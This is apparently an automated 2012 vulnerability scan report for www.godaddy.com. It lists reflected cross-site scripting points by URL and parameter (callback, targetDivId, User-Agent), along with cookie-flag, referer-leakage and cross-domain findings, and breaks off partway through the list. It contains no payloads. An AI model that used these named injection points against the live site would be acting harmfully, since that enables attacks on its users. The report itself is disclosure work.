Report generated by XSS.Cx at Sat Sep 01 08:41:35 EDT 2012.

XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, www.godaddy.com

Loading

1. Cross-site scripting (reflected)

1.1. http://www.godaddy.com/Domains/Controls/JsonContent/DotTypePricing.aspx [callback parameter]

1.2. http://www.godaddy.com/external/json/PcSetData.aspx [callback parameter]

1.3. http://www.godaddy.com/hosting/popups/wst-quicktour-widget.aspx [callback parameter]

1.4. http://www.godaddy.com/shared/homepage2/1/popups/instant-page.aspx [callback parameter]

1.5. http://www.godaddy.com/ssl/popups/ssl-quicktour-widget.aspx [callback parameter]

1.6. https://www.godaddy.com/domains/customize/JsonContent/ActivateYourDomain.aspx [targetDivId parameter]

1.7. https://www.godaddy.com/domains/customize/JsonContent/DomainPrivacyAndProtection.aspx [targetDivId parameter]

1.8. https://www.godaddy.com/domains/customize/JsonContent/DomainRegistrationInformation.aspx [targetDivId parameter]

1.9. https://www.godaddy.com/domains/customize/JsonContent/DomainSettings.aspx [targetDivId parameter]

1.10. https://www.godaddy.com/gdshop/browser_update.asp [User-Agent HTTP header]

1.11. https://www.godaddy.com/gdshop/browser_update.asp [User-Agent HTTP header]

1.12. https://www.godaddy.com/gdshop/change/ChangeRequest.asp [User-Agent HTTP header]

1.13. https://www.godaddy.com/gdshop/myportal/consolidate.asp [User-Agent HTTP header]

1.14. https://www.godaddy.com/gdshop/registrar/search.asp [User-Agent HTTP header]

1.15. https://www.godaddy.com/gdshop/shopper_lookup.asp [User-Agent HTTP header]

2. SSL cookie without secure flag set

2.1. https://www.godaddy.com/Domains/Search.aspx

2.2. https://www.godaddy.com/Payment/payment-options.aspx

2.3. https://www.godaddy.com/agreements/showdoc.aspx

2.4. https://www.godaddy.com/domains/customize.aspx

2.5. https://www.godaddy.com/domains/customize/JsonContent/ActivateYourDomain.aspx

2.6. https://www.godaddy.com/domains/customize/JsonContent/DomainPrivacyAndProtection.aspx

2.7. https://www.godaddy.com/domains/customize/JsonContent/DomainRegistrationInformation.aspx

2.8. https://www.godaddy.com/domains/customize/JsonContent/DomainSettings.aspx

2.9. https://www.godaddy.com/domains/domain-broker.aspx

2.10. https://www.godaddy.com/domains/popups/icannfee.aspx

2.11. https://www.godaddy.com/domains/searchresults.aspx

2.12. https://www.godaddy.com/legal-agreements.aspx

2.13. https://www.godaddy.com/offers/hot-deals.aspx

2.14. https://www.godaddy.com/offers/hot-deals2.aspx

2.15. https://www.godaddy.com/offers/jsoncontent/domaindeals.aspx

2.16. https://www.godaddy.com/offers/jsoncontent/productsales.aspx

2.17. https://www.godaddy.com/offers/jsoncontent/recommendeddomains.aspx

2.18. https://www.godaddy.com/offers/jsoncontent/recommendedoffers.aspx

2.19. https://www.godaddy.com/sso/keepalive.aspx

2.20. https://www.godaddy.com/domains/customize.aspx

2.21. https://www.godaddy.com/gdshop/browser_update.asp

2.22. https://www.godaddy.com/gdshop/change/ChangeRequest.asp

2.23. https://www.godaddy.com/gdshop/myportal/consolidate.asp

2.24. https://www.godaddy.com/gdshop/registrar/search.asp

2.25. https://www.godaddy.com/gdshop/shopper_lookup.asp

2.26. https://www.godaddy.com/offers/hot-deals.aspx

3. Flash cross-domain policy

3.1. http://www.godaddy.com/crossdomain.xml

3.2. https://www.godaddy.com/crossdomain.xml

4. Cookie without HttpOnly flag set

4.1. http://www.godaddy.com/gdshop/catalog.asp

4.2. http://www.godaddy.com/gdshop/ecommerce/shopping-cart.asp

4.3. http://www.godaddy.com/gdshop/hosting/dream_website.asp

4.4. http://www.godaddy.com/gdshop/prepayment/Landing.asp

4.5. http://www.godaddy.com/gdshop/sh_nonwst_websites.asp

4.6. https://www.godaddy.com/gdshop/broker/landing.asp

4.7. https://www.godaddy.com/gdshop/browser_update.asp

4.8. https://www.godaddy.com/gdshop/change/ChangeRequest.asp

4.9. https://www.godaddy.com/gdshop/legal_agreements/show_doc.asp

4.10. https://www.godaddy.com/gdshop/myportal/consolidate.asp

4.11. https://www.godaddy.com/gdshop/real_godaddy.asp

4.12. https://www.godaddy.com/gdshop/registrar/search.asp

4.13. https://www.godaddy.com/gdshop/shopper_lookup.asp

4.14. http://www.godaddy.com/

4.15. http://www.godaddy.com/Business/business-hosting.aspx

4.16. http://www.godaddy.com/Domains/Controls/JsonContent/DotTypePricing.aspx

4.17. http://www.godaddy.com/Domains/Controls/JsonContent/DotTypePricing.aspx

4.18. http://www.godaddy.com/Domains/Controls/JsonContent/StackPopIn.aspx

4.19. http://www.godaddy.com/Domains/Controls/JsonContent/generalPricing.aspx

4.20. http://www.godaddy.com/Domains/Controls/JsonContent/generalPricing.aspx/u0027

4.21. http://www.godaddy.com/Domains/Popups/IcannFee.aspx

4.22. http://www.godaddy.com/Domains/customize.aspx

4.23. http://www.godaddy.com/NewsCenter/about-godaddy.aspx

4.24. http://www.godaddy.com/NewsCenter/marketing-opportunities.aspx

4.25. http://www.godaddy.com/NewsCenter/releases.aspx

4.26. http://www.godaddy.com/NewsCenter/testimonials.aspx

4.27. http://www.godaddy.com/Payment/payment-options.aspx

4.28. http://www.godaddy.com/SocialMedia/social-media.aspx

4.29. http://www.godaddy.com/affiliates/affiliate-program.aspx

4.30. http://www.godaddy.com/agreements/ShowDoc.aspx

4.31. http://www.godaddy.com/appraisal/domain-appraisal.aspx

4.32. http://www.godaddy.com/auctions/domain-auctions.aspx

4.33. http://www.godaddy.com/auctions/popups/buy-sell-explanation.aspx

4.34. http://www.godaddy.com/auctions/popups/escrow.aspx

4.35. http://www.godaddy.com/business/mobile-app.aspx

4.36. http://www.godaddy.com/catalog.aspx

4.37. http://www.godaddy.com/charity/roundupforcharity.aspx

4.38. http://www.godaddy.com/design/web-design.aspx

4.39. http://www.godaddy.com/domainaddon/domain-alert.aspx

4.40. http://www.godaddy.com/domains/actions/json/adddomaintopending.aspx

4.41. http://www.godaddy.com/domains/bulk-domain-transfer.aspx

4.42. http://www.godaddy.com/domains/controls/jsoncontent/pendingproductssummary.aspx

4.43. http://www.godaddy.com/domains/controls/resultspricechartbulk.aspx

4.44. http://www.godaddy.com/domains/customize.aspx

4.45. http://www.godaddy.com/domains/domain-broker.aspx

4.46. http://www.godaddy.com/domains/domain-broker.aspx/

4.47. http://www.godaddy.com/domains/domain-transfer.aspx

4.48. http://www.godaddy.com/domains/domain_offer.aspx

4.49. http://www.godaddy.com/domains/popups/chart.aspx

4.50. http://www.godaddy.com/domains/search.aspx

4.51. http://www.godaddy.com/domains/search.aspx/u0027

4.52. http://www.godaddy.com/domains/searchbulk.aspx

4.53. http://www.godaddy.com/domains/searchidn.aspx

4.54. http://www.godaddy.com/domains/searchresults.aspx

4.55. http://www.godaddy.com/domains/searchresults.aspx

4.56. http://www.godaddy.com/domains/searchreview.aspx

4.57. http://www.godaddy.com/ecommerce/shopping-cart.aspx

4.58. http://www.godaddy.com/email/email-hosting.aspx

4.59. http://www.godaddy.com/email/online-storage.aspx

4.60. http://www.godaddy.com/gear/godaddy-gear.aspx

4.61. http://www.godaddy.com/hosting/content/website_builder_compare_plans.aspx

4.62. http://www.godaddy.com/hosting/content/website_builder_design_tools.aspx

4.63. http://www.godaddy.com/hosting/content/website_builder_features.aspx

4.64. http://www.godaddy.com/hosting/content/website_builder_how_it_works.aspx

4.65. http://www.godaddy.com/hosting/grid/popups/prove-it-4gh.aspx

4.66. http://www.godaddy.com/hosting/grid/popups/why-you-need-4gh.aspx

4.67. http://www.godaddy.com/hosting/hosting.aspx

4.68. http://www.godaddy.com/hosting/jsoncontent/grid-hosting-technology.aspx

4.69. http://www.godaddy.com/hosting/popups/wst-flashintros-quicktour-widget.aspx

4.70. http://www.godaddy.com/hosting/popups/wst-quicktour-widget.aspx

4.71. http://www.godaddy.com/hosting/popups/wst-sample-sites.aspx

4.72. http://www.godaddy.com/hosting/web-hosting.aspx

4.73. http://www.godaddy.com/hosting/web-hosting.aspx/

4.74. http://www.godaddy.com/hosting/website-builder.aspx

4.75. http://www.godaddy.com/hosting/website-builder.aspx

4.76. http://www.godaddy.com/hosting/website-builder.aspx/

4.77. http://www.godaddy.com/icann/domain_search.aspx

4.78. http://www.godaddy.com/jobs/default.aspx

4.79. http://www.godaddy.com/legal-agreements.aspx

4.80. http://www.godaddy.com/offers/hot-deals.aspx

4.81. http://www.godaddy.com/offers/hot-deals2.aspx

4.82. http://www.godaddy.com/popups/facebook-ads.aspx

4.83. http://www.godaddy.com/popups/fotolia.aspx

4.84. http://www.godaddy.com/popups/google-adwords.aspx

4.85. http://www.godaddy.com/popups/microsoft-advertising.aspx

4.86. http://www.godaddy.com/reseller/domain-reseller.aspx

4.87. http://www.godaddy.com/scholarship/default.aspx

4.88. http://www.godaddy.com/search-engine/seo-services.aspx

4.89. http://www.godaddy.com/shared/homepage2/1/popups/instant-page.aspx

4.90. http://www.godaddy.com/shared/video/producttube.aspx

4.91. http://www.godaddy.com/shared/video/videos.aspx

4.92. http://www.godaddy.com/site-map.aspx

4.93. http://www.godaddy.com/ssl/JsonContent/GetMultiDomainsPlanList.aspx

4.94. http://www.godaddy.com/ssl/jsoncontent/SSLComparePlans.aspx

4.95. http://www.godaddy.com/ssl/jsoncontent/SSLOursVsTheirs.aspx

4.96. http://www.godaddy.com/ssl/popups/ssl-quicktour-widget.aspx

4.97. http://www.godaddy.com/ssl/popups/ssl-quicktour-widget.aspx

4.98. http://www.godaddy.com/ssl/ssl-certificates.aspx

4.99. http://www.godaddy.com/ssl/ssl-certificates.aspx/

4.100. http://www.godaddy.com/ssl/ssl-open-source.aspx

4.101. http://www.godaddy.com/tlds/asia.aspx

4.102. http://www.godaddy.com/tlds/biz.aspx

4.103. http://www.godaddy.com/tlds/ca.aspx

4.104. http://www.godaddy.com/tlds/co-domain.aspx

4.105. http://www.godaddy.com/tlds/com.aspx

4.106. http://www.godaddy.com/tlds/info.aspx

4.107. http://www.godaddy.com/tlds/international-domain-names.aspx

4.108. http://www.godaddy.com/tlds/me.aspx

4.109. http://www.godaddy.com/tlds/mobi.aspx

4.110. http://www.godaddy.com/tlds/net.aspx

4.111. http://www.godaddy.com/tlds/org.aspx

4.112. http://www.godaddy.com/tlds/us.aspx

4.113. http://www.godaddy.com/tlds/ws.aspx

4.114. http://www.godaddy.com/tlds/xxx-domain.aspx

4.115. https://www.godaddy.com/Domains/Search.aspx

4.116. https://www.godaddy.com/Payment/payment-options.aspx

4.117. https://www.godaddy.com/agreements/showdoc.aspx

4.118. https://www.godaddy.com/domains/customize.aspx

4.119. https://www.godaddy.com/domains/customize.aspx

4.120. https://www.godaddy.com/domains/domain-broker.aspx

4.121. https://www.godaddy.com/domains/popups/icannfee.aspx

4.122. https://www.godaddy.com/domains/searchresults.aspx

4.123. https://www.godaddy.com/gdshop/browser_update.asp

4.124. https://www.godaddy.com/legal-agreements.aspx

4.125. https://www.godaddy.com/offers/hot-deals.aspx

4.126. https://www.godaddy.com/offers/hot-deals.aspx

4.127. https://www.godaddy.com/offers/hot-deals2.aspx

4.128. https://www.godaddy.com/offers/jsoncontent/domaindeals.aspx

4.129. https://www.godaddy.com/offers/jsoncontent/productsales.aspx

4.130. https://www.godaddy.com/offers/jsoncontent/recommendeddomains.aspx

4.131. https://www.godaddy.com/offers/jsoncontent/recommendedoffers.aspx

5. Password field with autocomplete enabled

5.1. http://www.godaddy.com/

5.2. http://www.godaddy.com/

5.3. http://www.godaddy.com/Business/business-hosting.aspx

5.4. http://www.godaddy.com/Business/business-hosting.aspx

5.5. http://www.godaddy.com/NewsCenter/about-godaddy.aspx

5.6. http://www.godaddy.com/NewsCenter/marketing-opportunities.aspx

5.7. http://www.godaddy.com/NewsCenter/releases.aspx

5.8. http://www.godaddy.com/NewsCenter/testimonials.aspx

5.9. http://www.godaddy.com/Payment/payment-options.aspx

5.10. http://www.godaddy.com/SocialMedia/social-media.aspx

5.11. http://www.godaddy.com/affiliates/affiliate-program.aspx

5.12. http://www.godaddy.com/affiliates/affiliate-program.aspx

5.13. http://www.godaddy.com/appraisal/domain-appraisal.aspx

5.14. http://www.godaddy.com/auctions/domain-auctions.aspx

5.15. http://www.godaddy.com/business/mobile-app.aspx

5.16. http://www.godaddy.com/catalog.aspx

5.17. http://www.godaddy.com/charity/roundupforcharity.aspx

5.18. http://www.godaddy.com/design/web-design.aspx

5.19. http://www.godaddy.com/domains/bulk-domain-transfer.aspx

5.20. http://www.godaddy.com/domains/domain-broker.aspx

5.21. http://www.godaddy.com/domains/domain-broker.aspx

5.22. http://www.godaddy.com/domains/domain-broker.aspx/

5.23. http://www.godaddy.com/domains/domain-broker.aspx/

5.24. http://www.godaddy.com/domains/domain-transfer.aspx

5.25. http://www.godaddy.com/domains/domain-transfer.aspx

5.26. http://www.godaddy.com/domains/domain_offer.aspx

5.27. http://www.godaddy.com/domains/search.aspx

5.28. http://www.godaddy.com/domains/search.aspx

5.29. http://www.godaddy.com/domains/search.aspx/u0027

5.30. http://www.godaddy.com/domains/searchbulk.aspx

5.31. http://www.godaddy.com/domains/searchbulk.aspx

5.32. http://www.godaddy.com/domains/searchidn.aspx

5.33. http://www.godaddy.com/domains/searchresults.aspx

5.34. http://www.godaddy.com/domains/searchreview.aspx

5.35. http://www.godaddy.com/ecommerce/shopping-cart.aspx

5.36. http://www.godaddy.com/ecommerce/shopping-cart.aspx

5.37. http://www.godaddy.com/email/email-hosting.aspx

5.38. http://www.godaddy.com/email/email-hosting.aspx

5.39. http://www.godaddy.com/email/online-storage.aspx

5.40. http://www.godaddy.com/email/online-storage.aspx

5.41. http://www.godaddy.com/gear/godaddy-gear.aspx

5.42. http://www.godaddy.com/hosting/hosting.aspx

5.43. http://www.godaddy.com/hosting/web-hosting.aspx

5.44. http://www.godaddy.com/hosting/web-hosting.aspx

5.45. http://www.godaddy.com/hosting/web-hosting.aspx

5.46. http://www.godaddy.com/hosting/web-hosting.aspx/

5.47. http://www.godaddy.com/hosting/web-hosting.aspx/

5.48. http://www.godaddy.com/hosting/website-builder.aspx

5.49. http://www.godaddy.com/hosting/website-builder.aspx

5.50. http://www.godaddy.com/hosting/website-builder.aspx

5.51. http://www.godaddy.com/hosting/website-builder.aspx/

5.52. http://www.godaddy.com/hosting/website-builder.aspx/

5.53. http://www.godaddy.com/icann/domain_search.aspx

5.54. http://www.godaddy.com/jobs/default.aspx

5.55. http://www.godaddy.com/legal-agreements.aspx

5.56. http://www.godaddy.com/offers/hot-deals2.aspx

5.57. http://www.godaddy.com/reseller/domain-reseller.aspx

5.58. http://www.godaddy.com/reseller/domain-reseller.aspx

5.59. http://www.godaddy.com/scholarship/default.aspx

5.60. http://www.godaddy.com/search-engine/seo-services.aspx

5.61. http://www.godaddy.com/search-engine/seo-services.aspx

5.62. http://www.godaddy.com/site-map.aspx

5.63. http://www.godaddy.com/ssl/ssl-certificates.aspx

5.64. http://www.godaddy.com/ssl/ssl-certificates.aspx

5.65. http://www.godaddy.com/ssl/ssl-certificates.aspx

5.66. http://www.godaddy.com/ssl/ssl-certificates.aspx/

5.67. http://www.godaddy.com/ssl/ssl-certificates.aspx/

5.68. http://www.godaddy.com/ssl/ssl-open-source.aspx

5.69. http://www.godaddy.com/tlds/asia.aspx

5.70. http://www.godaddy.com/tlds/biz.aspx

5.71. http://www.godaddy.com/tlds/ca.aspx

5.72. http://www.godaddy.com/tlds/co-domain.aspx

5.73. http://www.godaddy.com/tlds/co-domain.aspx

5.74. http://www.godaddy.com/tlds/com.aspx

5.75. http://www.godaddy.com/tlds/info.aspx

5.76. http://www.godaddy.com/tlds/international-domain-names.aspx

5.77. http://www.godaddy.com/tlds/me.aspx

5.78. http://www.godaddy.com/tlds/mobi.aspx

5.79. http://www.godaddy.com/tlds/net.aspx

5.80. http://www.godaddy.com/tlds/org.aspx

5.81. http://www.godaddy.com/tlds/us.aspx

5.82. http://www.godaddy.com/tlds/ws.aspx

5.83. http://www.godaddy.com/tlds/xxx-domain.aspx

5.84. https://www.godaddy.com/Domains/Search.aspx

5.85. https://www.godaddy.com/Payment/payment-options.aspx

5.86. https://www.godaddy.com/domains/customize.aspx

5.87. https://www.godaddy.com/domains/domain-broker.aspx

5.88. https://www.godaddy.com/domains/domain-broker.aspx

5.89. https://www.godaddy.com/legal-agreements.aspx

5.90. https://www.godaddy.com/offers/hot-deals2.aspx

5.91. https://www.godaddy.com/offers/hot-deals2.aspx

6. Referer-dependent response

6.1. http://www.godaddy.com/

6.2. http://www.godaddy.com/shared/homepage2/1/popups/instant-page.aspx

6.3. https://www.godaddy.com/domains/customize.aspx

7. Cookie scoped to parent domain

7.1. http://www.godaddy.com/

7.2. http://www.godaddy.com/Business/business-hosting.aspx

7.3. http://www.godaddy.com/Domains/Controls/JsonContent/DotTypePricing.aspx

7.4. http://www.godaddy.com/Domains/Controls/JsonContent/DotTypePricing.aspx

7.5. http://www.godaddy.com/Domains/Controls/JsonContent/StackPopIn.aspx

7.6. http://www.godaddy.com/Domains/Controls/JsonContent/generalPricing.aspx

7.7. http://www.godaddy.com/Domains/Controls/JsonContent/generalPricing.aspx/u0027

7.8. http://www.godaddy.com/Domains/Popups/IcannFee.aspx

7.9. http://www.godaddy.com/Domains/customize.aspx

7.10. http://www.godaddy.com/NewsCenter/about-godaddy.aspx

7.11. http://www.godaddy.com/NewsCenter/marketing-opportunities.aspx

7.12. http://www.godaddy.com/NewsCenter/releases.aspx

7.13. http://www.godaddy.com/NewsCenter/testimonials.aspx

7.14. http://www.godaddy.com/Payment/payment-options.aspx

7.15. http://www.godaddy.com/SocialMedia/social-media.aspx

7.16. http://www.godaddy.com/affiliates/affiliate-program.aspx

7.17. http://www.godaddy.com/agreements/ShowDoc.aspx

7.18. http://www.godaddy.com/appraisal/domain-appraisal.aspx

7.19. http://www.godaddy.com/auctions/domain-auctions.aspx

7.20. http://www.godaddy.com/auctions/popups/buy-sell-explanation.aspx

7.21. http://www.godaddy.com/auctions/popups/escrow.aspx

7.22. http://www.godaddy.com/business/mobile-app.aspx

7.23. http://www.godaddy.com/catalog.aspx

7.24. http://www.godaddy.com/charity/roundupforcharity.aspx

7.25. http://www.godaddy.com/design/web-design.aspx

7.26. http://www.godaddy.com/domainaddon/domain-alert.aspx

7.27. http://www.godaddy.com/domains/actions/json/adddomaintopending.aspx

7.28. http://www.godaddy.com/domains/bulk-domain-transfer.aspx

7.29. http://www.godaddy.com/domains/controls/jsoncontent/pendingproductssummary.aspx

7.30. http://www.godaddy.com/domains/controls/resultspricechartbulk.aspx

7.31. http://www.godaddy.com/domains/customize.aspx

7.32. http://www.godaddy.com/domains/domain-broker.aspx

7.33. http://www.godaddy.com/domains/domain-broker.aspx/

7.34. http://www.godaddy.com/domains/domain-transfer.aspx

7.35. http://www.godaddy.com/domains/domain_offer.aspx

7.36. http://www.godaddy.com/domains/popups/chart.aspx

7.37. http://www.godaddy.com/domains/search.aspx

7.38. http://www.godaddy.com/domains/search.aspx/u0027

7.39. http://www.godaddy.com/domains/searchbulk.aspx

7.40. http://www.godaddy.com/domains/searchidn.aspx

7.41. http://www.godaddy.com/domains/searchresults.aspx

7.42. http://www.godaddy.com/domains/searchresults.aspx

7.43. http://www.godaddy.com/domains/searchreview.aspx

7.44. http://www.godaddy.com/ecommerce/shopping-cart.aspx

7.45. http://www.godaddy.com/email/email-hosting.aspx

7.46. http://www.godaddy.com/email/online-storage.aspx

7.47. http://www.godaddy.com/gdshop/sh_nonwst_websites.asp

7.48. http://www.godaddy.com/gear/godaddy-gear.aspx

7.49. http://www.godaddy.com/hosting/content/website_builder_compare_plans.aspx

7.50. http://www.godaddy.com/hosting/content/website_builder_design_tools.aspx

7.51. http://www.godaddy.com/hosting/content/website_builder_features.aspx

7.52. http://www.godaddy.com/hosting/content/website_builder_how_it_works.aspx

7.53. http://www.godaddy.com/hosting/grid/popups/prove-it-4gh.aspx

7.54. http://www.godaddy.com/hosting/grid/popups/why-you-need-4gh.aspx

7.55. http://www.godaddy.com/hosting/hosting.aspx

7.56. http://www.godaddy.com/hosting/jsoncontent/grid-hosting-technology.aspx

7.57. http://www.godaddy.com/hosting/popups/wst-flashintros-quicktour-widget.aspx

7.58. http://www.godaddy.com/hosting/popups/wst-quicktour-widget.aspx

7.59. http://www.godaddy.com/hosting/popups/wst-sample-sites.aspx

7.60. http://www.godaddy.com/hosting/web-hosting.aspx

7.61. http://www.godaddy.com/hosting/web-hosting.aspx/

7.62. http://www.godaddy.com/hosting/website-builder.aspx

7.63. http://www.godaddy.com/hosting/website-builder.aspx

7.64. http://www.godaddy.com/hosting/website-builder.aspx/

7.65. http://www.godaddy.com/icann/domain_search.aspx

7.66. http://www.godaddy.com/jobs/default.aspx

7.67. http://www.godaddy.com/legal-agreements.aspx

7.68. http://www.godaddy.com/offers/hot-deals.aspx

7.69. http://www.godaddy.com/offers/hot-deals2.aspx

7.70. http://www.godaddy.com/popups/facebook-ads.aspx

7.71. http://www.godaddy.com/popups/fotolia.aspx

7.72. http://www.godaddy.com/popups/google-adwords.aspx

7.73. http://www.godaddy.com/popups/microsoft-advertising.aspx

7.74. http://www.godaddy.com/reseller/domain-reseller.aspx

7.75. http://www.godaddy.com/scholarship/default.aspx

7.76. http://www.godaddy.com/search-engine/seo-services.aspx

7.77. http://www.godaddy.com/shared/homepage2/1/popups/instant-page.aspx

7.78. http://www.godaddy.com/shared/video/producttube.aspx

7.79. http://www.godaddy.com/shared/video/videos.aspx

7.80. http://www.godaddy.com/site-map.aspx

7.81. http://www.godaddy.com/ssl/JsonContent/GetMultiDomainsPlanList.aspx

7.82. http://www.godaddy.com/ssl/jsoncontent/SSLComparePlans.aspx

7.83. http://www.godaddy.com/ssl/jsoncontent/SSLOursVsTheirs.aspx

7.84. http://www.godaddy.com/ssl/popups/ssl-quicktour-widget.aspx

7.85. http://www.godaddy.com/ssl/popups/ssl-quicktour-widget.aspx

7.86. http://www.godaddy.com/ssl/ssl-certificates.aspx

7.87. http://www.godaddy.com/ssl/ssl-certificates.aspx/

7.88. http://www.godaddy.com/ssl/ssl-open-source.aspx

7.89. http://www.godaddy.com/tlds/asia.aspx

7.90. http://www.godaddy.com/tlds/biz.aspx

7.91. http://www.godaddy.com/tlds/ca.aspx

7.92. http://www.godaddy.com/tlds/co-domain.aspx

7.93. http://www.godaddy.com/tlds/com.aspx

7.94. http://www.godaddy.com/tlds/info.aspx

7.95. http://www.godaddy.com/tlds/international-domain-names.aspx

7.96. http://www.godaddy.com/tlds/me.aspx

7.97. http://www.godaddy.com/tlds/mobi.aspx

7.98. http://www.godaddy.com/tlds/net.aspx

7.99. http://www.godaddy.com/tlds/org.aspx

7.100. http://www.godaddy.com/tlds/us.aspx

7.101. http://www.godaddy.com/tlds/ws.aspx

7.102. http://www.godaddy.com/tlds/xxx-domain.aspx

7.103. https://www.godaddy.com/Domains/Search.aspx

7.104. https://www.godaddy.com/Payment/payment-options.aspx

7.105. https://www.godaddy.com/agreements/showdoc.aspx

7.106. https://www.godaddy.com/domains/customize.aspx

7.107. https://www.godaddy.com/domains/customize.aspx

7.108. https://www.godaddy.com/domains/domain-broker.aspx

7.109. https://www.godaddy.com/domains/popups/icannfee.aspx

7.110. https://www.godaddy.com/domains/searchresults.aspx

7.111. https://www.godaddy.com/gdshop/browser_update.asp

7.112. https://www.godaddy.com/gdshop/change/ChangeRequest.asp

7.113. https://www.godaddy.com/gdshop/myportal/consolidate.asp

7.114. https://www.godaddy.com/gdshop/registrar/search.asp

7.115. https://www.godaddy.com/gdshop/shopper_lookup.asp

7.116. https://www.godaddy.com/legal-agreements.aspx

7.117. https://www.godaddy.com/offers/hot-deals.aspx

7.118. https://www.godaddy.com/offers/hot-deals.aspx

7.119. https://www.godaddy.com/offers/hot-deals2.aspx

7.120. https://www.godaddy.com/offers/jsoncontent/domaindeals.aspx

7.121. https://www.godaddy.com/offers/jsoncontent/productsales.aspx

7.122. https://www.godaddy.com/offers/jsoncontent/recommendeddomains.aspx

7.123. https://www.godaddy.com/offers/jsoncontent/recommendedoffers.aspx

8. Cross-domain Referer leakage

8.1. http://www.godaddy.com/

8.2. http://www.godaddy.com/

8.3. http://www.godaddy.com/Business/business-hosting.aspx

8.4. http://www.godaddy.com/Domains/Popups/IcannFee.aspx

8.5. http://www.godaddy.com/NewsCenter/about-godaddy.aspx

8.6. http://www.godaddy.com/NewsCenter/marketing-opportunities.aspx

8.7. http://www.godaddy.com/NewsCenter/releases.aspx

8.8. http://www.godaddy.com/NewsCenter/testimonials.aspx

8.9. http://www.godaddy.com/Payment/payment-options.aspx

8.10. http://www.godaddy.com/SocialMedia/social-media.aspx

8.11. http://www.godaddy.com/affiliates/affiliate-program.aspx

8.12. http://www.godaddy.com/affiliates/affiliate-program.aspx

8.13. http://www.godaddy.com/agreements/showdoc.aspx

8.14. http://www.godaddy.com/auctions/domain-auctions.aspx

8.15. http://www.godaddy.com/auctions/popups/buy-sell-explanation.aspx

8.16. http://www.godaddy.com/auctions/popups/escrow.aspx

8.17. http://www.godaddy.com/business/mobile-app.aspx

8.18. http://www.godaddy.com/catalog.aspx

8.19. http://www.godaddy.com/charity/roundupforcharity.aspx

8.20. http://www.godaddy.com/design/web-design.aspx

8.21. http://www.godaddy.com/domains/bulk-domain-transfer.aspx

8.22. http://www.godaddy.com/domains/domain-broker.aspx

8.23. http://www.godaddy.com/domains/domain-broker.aspx/

8.24. http://www.godaddy.com/domains/domain-transfer.aspx

8.25. http://www.godaddy.com/domains/domain-transfer.aspx

8.26. http://www.godaddy.com/domains/domain_offer.aspx

8.27. http://www.godaddy.com/domains/popups/chart.aspx

8.28. http://www.godaddy.com/domains/search.aspx

8.29. http://www.godaddy.com/domains/search.aspx

8.30. http://www.godaddy.com/domains/search.aspx/u0027

8.31. http://www.godaddy.com/domains/searchbulk.aspx

8.32. http://www.godaddy.com/domains/searchbulk.aspx

8.33. http://www.godaddy.com/domains/searchidn.aspx

8.34. http://www.godaddy.com/domains/searchresults.aspx

8.35. http://www.godaddy.com/domains/searchreview.aspx

8.36. http://www.godaddy.com/ecommerce/shopping-cart.aspx

8.37. http://www.godaddy.com/email/email-hosting.aspx

8.38. http://www.godaddy.com/email/online-storage.aspx

8.39. http://www.godaddy.com/gear/godaddy-gear.aspx

8.40. http://www.godaddy.com/hosting/grid/popups/prove-it-4gh.aspx

8.41. http://www.godaddy.com/hosting/grid/popups/why-you-need-4gh.aspx

8.42. http://www.godaddy.com/hosting/hosting.aspx

8.43. http://www.godaddy.com/hosting/jsoncontent/grid-hosting-technology.aspx

8.44. http://www.godaddy.com/hosting/popups/wst-sample-sites.aspx

8.45. http://www.godaddy.com/hosting/web-hosting.aspx

8.46. http://www.godaddy.com/hosting/web-hosting.aspx

8.47. http://www.godaddy.com/hosting/web-hosting.aspx

8.48. http://www.godaddy.com/hosting/web-hosting.aspx/

8.49. http://www.godaddy.com/hosting/website-builder.aspx

8.50. http://www.godaddy.com/hosting/website-builder.aspx

8.51. http://www.godaddy.com/hosting/website-builder.aspx

8.52. http://www.godaddy.com/hosting/website-builder.aspx/

8.53. http://www.godaddy.com/icann/domain_search.aspx

8.54. http://www.godaddy.com/jobs/default.aspx

8.55. http://www.godaddy.com/legal-agreements.aspx

8.56. http://www.godaddy.com/offers/hot-deals2.aspx

8.57. http://www.godaddy.com/popups/facebook-ads.aspx

8.58. http://www.godaddy.com/popups/fotolia.aspx

8.59. http://www.godaddy.com/popups/google-adwords.aspx

8.60. http://www.godaddy.com/popups/microsoft-advertising.aspx

8.61. http://www.godaddy.com/reseller/domain-reseller.aspx

8.62. http://www.godaddy.com/scholarship/default.aspx

8.63. http://www.godaddy.com/search-engine/seo-services.aspx

8.64. http://www.godaddy.com/search-engine/seo-services.aspx

8.65. http://www.godaddy.com/site-map.aspx

8.66. http://www.godaddy.com/ssl/ssl-certificates.aspx

8.67. http://www.godaddy.com/ssl/ssl-certificates.aspx

8.68. http://www.godaddy.com/ssl/ssl-certificates.aspx

8.69. http://www.godaddy.com/ssl/ssl-certificates.aspx/

8.70. http://www.godaddy.com/ssl/ssl-open-source.aspx

8.71. http://www.godaddy.com/tlds/asia.aspx

8.72. http://www.godaddy.com/tlds/biz.aspx

8.73. http://www.godaddy.com/tlds/ca.aspx

8.74. http://www.godaddy.com/tlds/co-domain.aspx

8.75. http://www.godaddy.com/tlds/co-domain.aspx

8.76. http://www.godaddy.com/tlds/com.aspx

8.77. http://www.godaddy.com/tlds/info.aspx

8.78. http://www.godaddy.com/tlds/international-domain-names.aspx

8.79. http://www.godaddy.com/tlds/me.aspx

8.80. http://www.godaddy.com/tlds/mobi.aspx

8.81. http://www.godaddy.com/tlds/net.aspx

8.82. http://www.godaddy.com/tlds/org.aspx

8.83. http://www.godaddy.com/tlds/us.aspx

8.84. http://www.godaddy.com/tlds/ws.aspx

8.85. http://www.godaddy.com/tlds/xxx-domain.aspx

8.86. https://www.godaddy.com/Domains/Search.aspx

8.87. https://www.godaddy.com/Payment/payment-options.aspx

8.88. https://www.godaddy.com/agreements/showdoc.aspx

8.89. https://www.godaddy.com/domains/customize.aspx

8.90. https://www.godaddy.com/domains/domain-broker.aspx

8.91. https://www.godaddy.com/domains/popups/icannfee.aspx

8.92. https://www.godaddy.com/gdshop/browser_update.asp

8.93. https://www.godaddy.com/legal-agreements.aspx

8.94. https://www.godaddy.com/offers/hot-deals2.aspx

8.95. https://www.godaddy.com/offers/hot-deals2.aspx

9. Cross-domain script include

9.1. http://www.godaddy.com/

9.2. http://www.godaddy.com/Business/business-hosting.aspx

9.3. http://www.godaddy.com/Domains/Actions/Json/DomainAvailabilityCheck.aspx

9.4. http://www.godaddy.com/Domains/Popups/IcannFee.aspx

9.5. http://www.godaddy.com/NewsCenter/about-godaddy.aspx

9.6. http://www.godaddy.com/NewsCenter/marketing-opportunities.aspx

